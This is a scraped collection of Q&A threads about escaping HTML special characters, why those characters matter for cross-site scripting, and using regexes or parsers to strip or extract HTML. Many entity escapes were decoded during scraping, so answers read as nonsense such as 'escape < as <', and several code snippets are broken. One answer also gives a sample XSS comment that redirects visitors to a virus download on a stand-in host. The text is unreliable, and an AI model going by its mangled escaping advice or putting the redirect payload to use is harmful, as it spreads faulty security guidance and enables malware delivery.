In the HTML file, I need to show some XML code. The problem is that I can't use
<pre>..</pre>
to show '<' and '>'.
What would be the solution for this problem?
ADDED
From the answer, replacing '<' and '>' to < and> can be a solution. I'm an Emacs user, are there Emacs tools/magic to do that automatically? I mean, I can use search and replace, but I expect Emacs can do it by 'select region' -> 'M-x replace_xml' or something.
You need to escape < as < and & as &. Optionally, for consistency, you can escape > as >
To do this automatically in Emacs, if you're in HTML mode, you can select the code that you would like to escape, and run M-x sgml-quote.
You need to replace < by < and > by >. How to do this depends on the server side language in question.
Update: as per your update: this is not programming related anymore. I think http://superuser.com is a better place to ask software related questions.
As already mentioned, you need to escape the XML. For robustness I would also escape single and double quotes too. Note that CDATA and <pre> can cause you problems if, for any reason, your XML document includes ]]> or </pre> in it.
You can get away with doing a straight string substitution for the escaping, but if you do, make sure you escape & to & before doing any of the other escapes.
As other have noted, you need to escape the xml markup to display it in html.
Take a look at xmlverbatim stylesheet: It does that as well as pretty printing and colorizing.
If you google around there are several stylesheets to do similar formatting.
Select the region
Do M-% < RET < RET !
Do a substitution using a programming language without Emacs.
For Python:
#Make a copy just in case.
#Open file.
#Read lines.
for line in lines:
line = line.replace("<pre>", "<").replace("</pre>", ">")
#Output to file.
#Enjoy!
Related
In PHP, there is a function called htmlspecialchars() that performs the following substitutions on a string:
& (ampersand) is converted to &
" (double quote) is converted to "
' (single quote) is converted to ' (only if the flag ENT_QUOTES is set)
< (less than) is converted to <
> (greater than) is converted to >
Apparently, this is done on the grounds that these 5 specific characters are the unsafe HTML characters.
I can understand why the last two are considered unsafe: if they are simply "echoed", arbitrary/dangerous HTML could be delivered, including potential javascript with <script> and all that.
Question 1. Why are the first three characters (ampersand, double quote, single quote) also considered 'unsafe'?
Also, I stumbled upon this library called "he" on GitHub (by Mathias Bynens), which is about encoding/decoding HTML entities. There, I found the following:
[...] characters that are unsafe for use in HTML content (&, <, >, ", ', and `) will be encoded. [...]
(source)
Question 2. Is there a good reason for considering the backtick another unsafe HTML character? If yes, does this mean that PHP's function mentioned above is outdated?
Finally, all this begs the question:
Question 3. Are there any other characters that should be considered 'unsafe', alongside those 5/6 characters mentioned above?
Donovan_D's answer pretty much explains it, but I'll provide some examples here of how specifically these particular characters can cause problems.
Those characters are considered unsafe because they are the most obvious ways to perform an XSS (Cross-Site Scripting) attack (or break a page by accident with innocent input).
Consider a comment feature on a website. You submit a form with a textarea. It gets saved into the database, and then displayed on the page for all visitors.
Now I sumbit a comment that looks like this.
<script type="text/javascript">
window.top.location.href="http://www.someverybadsite.website/downloadVirus.exe";
</script>
And suddenly, everyone that visits your page is redirected to a virus download. The naive approach here is just to say, okay wellt hen let's filter out some of the important characters in that attack:
< and > will be replaced with < and > and now suddenly our script isn't a script. It's just some html-looking text.
A similar situation arsises with a comment like
Something is <<wrong>> here.
Supposing a user used <<...>> to emphasize for some reason. Their comment would render is
Something is <> here.
Obviously not desirable behavior.
A less malicious situation arises with &. & is used to denote HTML entities such as & and " and < etc. So it's fairly easy for innocent-looking text to accidentally be an html entity and end up looking very different and very odd for a user.
Consider the comment
I really like #455 ó please let me know when they're available for purchase.
This would be rendered as
I really like #455 ó please let me know when they're available for purchase.
Obviously not intended behavior.
The point is, these symbols were identified as key to preventing most XSS vulnerabilities/bugs most of the time since they are likely to be used in valid input, but need to be escaped to properly render out in HTML.
To your second question, I am personally unaware of any way that the backtick should be considered an unsafe HTML character.
As for your third, maybe. Don't rely on blacklists to filter user input. Instead, use a whitelist of known OK input and work from there.
These chars Are unsafe because in html the <> define a tag. The "", and '' are used to surround attributes. the & is encoded because of the use in html entities. no other chars Should be encoded but they can be ex: the trade symbol can be made into ™ the US dollar sign can be made into $ the euro can be € ANY emoji can be made out of a HTML entity (the name of the encoded things)you can find a explanation/examples here
I got an input file that I need to print directly into an html page.
I did $inputfile =~ s/\n/<br>/g; Are there any other special characters I should be aware of maybe other than < and > when printing this $inputfile to html?
You absolutely should use HTML::Escape instead of doing some ill-conceived hackjob which will cause everyone who deals with your code (you included) to curse your name in the future.
It's simple - install HTML::Escape via CPAN, then use it thus:
use HTML::Escape qw(escape_html);
my $escaped_string = escape_html($string);
Note that if you want to preserve whitespace formatting you should use a module to do that, as well, such as HTML::FromText - the above code will not automagically convert line breaks to tags because that's different completely from escaping unsafe characters to HTML entities.
I'm extracting some content from a website with this pattern:
([^+]+)
and it outputs
< img src=""http://www."" border=""0""/>
with double quotes. What is wrong with my query?
your problem only makes sense if you modify your regexp.
but first of all, beware:
in general, what you try to achieve is not feasible using regexes. they are the inappropriate tool to do it. you will not come up with a solution 100% correct using regexes.
having said this, try to replace ([^+]+) with (([^<!--]+([^<]|<[^!]|<![^-]|<!-[^-]))+). note that this regex assumes the following:
there are no html comments inside the message portion
there are no strings containing html comment openings inside the message portion
the message portion is a valid html fragment
(otherwise it would match eg. <!-<!-- / message -->)
you have been warned.
btw, the dquote doubling must be a standard escape mechanism of the imacro environment.
for example :
I want to remove all highlighted tags
alt text http://shup.com/Shup/299976/110220132930-My-Desktop.png
You could use a regular expression in any editor that supports them. For instance, I tested this one in Dreamweaver:
<(?!\!|input|br|img|meta|hr)[^/>]*?>[\s]*?</[^>]*?>
Just make a search and replace all (with the regex as search string and nothing as replacement). Note however that this may remove necessary whitespace. If you just want to remove empty tags without anything in between,
<(?!\!|input|br|img|meta|hr)[^/>]*?></[^>]*?>
would be the way to go.
Update: You want to remove  s as well:
<(?!\!|input|br|img|meta|hr)[^/>]*?>(?:[\s]| )*?</[^>]*?>
I did not verify this one - it should be OK though, try it out :-)
If this is only about quickly editing a file, and your editor supports regular expression replacement, you can use a regex like this:
<[^>]+></[^>]+>
Search for this regex, and replace with an empty string.
Note: This isn't safe in any way - don't rely on it, as it can find more things than just valid, empty tags. (It would also find <a></b> for example.) There is no safe way to do this with regexes - but if you check each replacement manually, you should be fine. If you need real safe replacement, then either you'll have to find an editor that supports this (JEdit may be a good bet, but I haven't checked), or you'll have to parse the file yourself - e.g. using XSLT.
What you're asking for sounds like a job for regular expressions. Many editors support regular expression find/replace. Personally, I'd probably do this from the command-line with Perl (sed would also work), but that's just me.
perl -pe 's|<([^\s>]+)[^>]*></\1>||g' < file.html > new_file.html
or if you're brave, edit the file in place:
perl -pe 's|<([^\s>]+)[^>]*></\1>||g' -i file.html
This will remove:
<p></p>
<p id="foo"></p>
but not:
<p>hello world</p>
<p></a>
Warning: things like <img src="pic.png"></img> and <br></br> will also be removed. It's not obvious from your question, but I'll assume this is undesirable. Maybe you're not worried because you know all your images are declared like this <img src="pic.png"/>. Otherwise the regular expression will need to be modified to account for this, but I decided to start simple for an easier explanation...
It works by matching the opening tag: a literal < followed by the tag name (one or more characters which are not whitespace or > = [^\s>]+), any attributes (zero or more characters which aren't > = [^>]*), and then a literal >; and a closing tag with the same name: this takes advantage of the fact that we captured the tag name, so we can use a backreference = </\1>. The matches are then replaced with the empty string.
If the syntax/terminology used here is unfamiliar to you, I'm a fan of the perlre documentation page. Regular expression syntax in other languages should be very similar if not identical to this, so hopefully this will be useful even if you don't Perl :)
Oh, one more thing. If you have things like <div><p></p></div>, these will not be picked up all at once. You'll have to do multiple passes: the first will remove the <p></p> leaving a <div></div>to be removed by the second. In Perl, the substitution operator returns the number of replacements made, so you can:
perl -pe '1 while s|<([^\s>]+)[^>]*></\1>||g' < file.html > new_file.html
My text file contains 2 lines:
<IMG SRC="/icons/folder.gif" ALT="[DIR]"> yahoo.com.jp/
</PRE><HR>
In my Perl script, I have:
my $String =~ /.*(HREF=")(.*)(">)/;
print "$2";
and my output is the following:
Output 1: yahoo.com.jp
Output 2: ><HR>
What I am trying to achieve is have my Perl script automatically extract the string inside the <A Href="">
As I am very new to regex, I want to ask if my regex is a badly formed one? If so can someone provide some suggestion to make it look nicer?
Secondly, I do not know why my second output is "><HR>", I thought the expected behavior is that output2 will be skipped since it does not contain HREF=". Obviously I am very wrong.
Thanks for the help.
To answer your specific question about why your regex isn't working, you're using .*, which is "greedy" - it will by default match as much as you can. Alternatives would be using the non-greedy form, .*?, or be a bit more exacting about what you're trying to match. For instance, [^"]* will match anything that's not a double quote, which seems to be what you're looking for.
But yes, the other posters are correct - using regular expressions to do anything non-trivial in HTML parsing is a recipe for disaster. Technically you can do it properly, especially in Perl 5.10 (which has more advanced regular expression features), but it's usually not worth the headache.
Using regular expressions to parse HTML works just often enough to lull you into a false sense of security. You can get away with it for simple cases where you control the input but you're better off using something like HTML::Parser instead.
If I may, I'd like to suggest the simplest way of doing this (it may not be the fastest or lightest-weight way): HTML::TreeBuilder::XPath
It gives you the power of XPath in non-well-formed HTML.
use HTML::TreeBuilder::XPath;
my $tree= HTML::TreeBuilder::XPath->new_from_file( 'D:\Archive\XPath.pm.htm' );
my #hrefs = $tree->findvalues( '//div[#class="noprint"]/a/#href');
print "The links are: ", join( ',', #hrefs ), "\n";
When trying to match against HTML (or XML) with a regex you have to be careful about using . Rarely ever do you want a . because start is a greedy modifier that will match as far as it can. as Gumbo showed use the character class specifier [^"]* to match all characters except a quote. This will match till the end quote. You may also want to use something similar for matching the angle bracket. Try this:
/HREF="([^"]*)"[^>]*>/i
That should match much more consistently.